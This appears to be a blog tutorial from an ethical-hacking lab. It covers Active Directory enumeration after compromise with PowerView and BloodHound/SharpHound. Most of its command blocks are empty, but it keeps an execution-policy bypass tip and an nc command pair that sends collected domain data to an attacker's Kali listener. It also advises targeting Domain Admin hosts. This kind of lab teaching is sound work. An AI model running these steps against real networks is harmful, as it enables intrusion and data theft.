Post enumeration of lab with credentials/hashes captured. Overview of PowerView and Bloodhound setup/usage.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.
Based off TheCyberMentor amazing Udemy course available at https://www.udemy.com/course/practical-ethical-hacking/
Requirements/Tools
Requirements: With credentials recovered from the mitm attack we can use tools
Tools:
- PowerView — Link: https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
- Bloodhound
Using PowerView
Download PowerView.ps1
to target
Execute policy bypass (used to execute scripts - not security)
1 |
|
Execute PowerView
1 |
|
Very powerful tool with more information available via cheat sheet:
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Get Domain Policy:
1 |
|
1 |
|
1 |
|
find password length and just start attacking with 7 chars passwords.
Find Users:
1 |
|
Long semi unreadable list
Refined list:
1 |
|
List property we can search for via pipe:
1 |
|
Find properties of the passwords last set:
1 |
|
can find if we have stale passwords on the network.
Check Logon Count (used to identify honeypot accounts):
1 |
|
Check bad password counts (You can see if an account is under attack):
1 |
|
List all network domain computers:
1 |
|
more information:
1 |
|
Slightly too much information
Find the operating systems:
1 |
|
Pick apart the network as to which are the servers.
Find Domain Admins
1 |
|
Get Members of Admins
1 |
|
Find All SMB Shares on the Network:
1 |
|
Find All Group Policies:
Check GPO for changes in displaynames and when they were changed:
1 |
|
condensed version of larger output.
Bloodhound
Downloads the data from Active Directory and put into a visual graph.
1 |
|
neo4j console setup neo4j - change default passwords
open at link:
login with neo4j:neo4j
- prompted to change password
opted to used kali password.
Neo4j Dashboard
Launch Bloodhound - Linux/Kali
1 |
|
Login with neo4j account and neo4j account URL. - Bloodhoud setup and next step to pull data with injester.
Pull data with In-jester
- invoke bloodhound - powershell
Link: https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
- Place onto windows 10 machine
Within command prompt setup ep bypass
1 |
|
Call Sharphound.ps1
1 |
|
Invoke Sharphound
1 |
|
Move file to kali - Used nc
file transfer method - downloaded nc.exe
via SimpleHTTPServer on kali.
nc File Transfer Method:
- Kali setup listener: ncat -lvp 80 > file.zip
- Windows 10 machine nc -nv 192.168.175.129 80 < file.zip -w15
file received:
Import file.zip into Bloodhound Upload file.zip via upload button within bloodhound:
at this point my Bloodhound crashed when loading file.zip to which I attempted to reinstall… and failed. Moved to create for source… failed. All mainly due to the fact that i was on x86 version of Kali. Moved to Install Bloodhound on a Windows 10 machine following these directions:
https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/
Neoj4 BloodHound issues:
IMPORTANT: When you install java on the machine you will need to edit line 75:
1 |
|
and within the java folder you need to copy the “client” folder and paste it as “server”:
1 |
|
Launch Bloodhound - Windows
From this point was able to load the file.zip
into BloodHound:
Queries:
Finding domain admins via “Find all Domain Admins” query
You will want to target boxes with Domain Admins have accounts.
- Locating High Value Targets via Query
to which paths get illuminated in red to follow
Once a network is compromised you can plan your next target with Bloodhound.